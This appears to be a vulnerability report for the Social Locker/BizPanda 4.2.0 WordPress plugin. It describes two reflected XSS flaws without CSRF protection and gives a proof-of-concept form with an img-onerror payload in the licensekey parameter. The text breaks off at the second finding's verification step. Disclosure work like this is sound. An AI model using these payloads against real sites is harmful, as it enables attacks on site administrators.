Hello,

Plugin: Social Locker | BizPanda 4.2.0 https://wordpress.org/plugins/social-locker/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection!).

Method: POST

Url: http://localhost/wp-admin/edit.php?post_type=opanda-item&page=license-manager-sociallocker-next

Vulnerable parameters: licensekey

Example PHP callstack:

OnpLicensing325_LicenseManagerPage::indexAction   /social-locker/bizpanda/libs/onepress/licensing/includes/license-manager.class.php:334]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/edit.php?post_type=opanda-item&page=license-manager-sociallocker-next" />

<input type="text" name="licensekey" value='"><img src=x onerror=alert(1) />' />

<input type="submit" name="submit" />

</form>

--

2. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection!).

Method: GET

Url: http://localhost/wp-admin/edit.php?post_type=opanda-item&page=leads-bizpanda&s=1&opanda_status=[xss]

Vulnerable parameters: opanda_status

Example PHP callstack:

OPanda_LeadsListTable::search_box   [/social-locker/bizpanda/admin/includes/classes/class.leads.table.php:78]

Verification: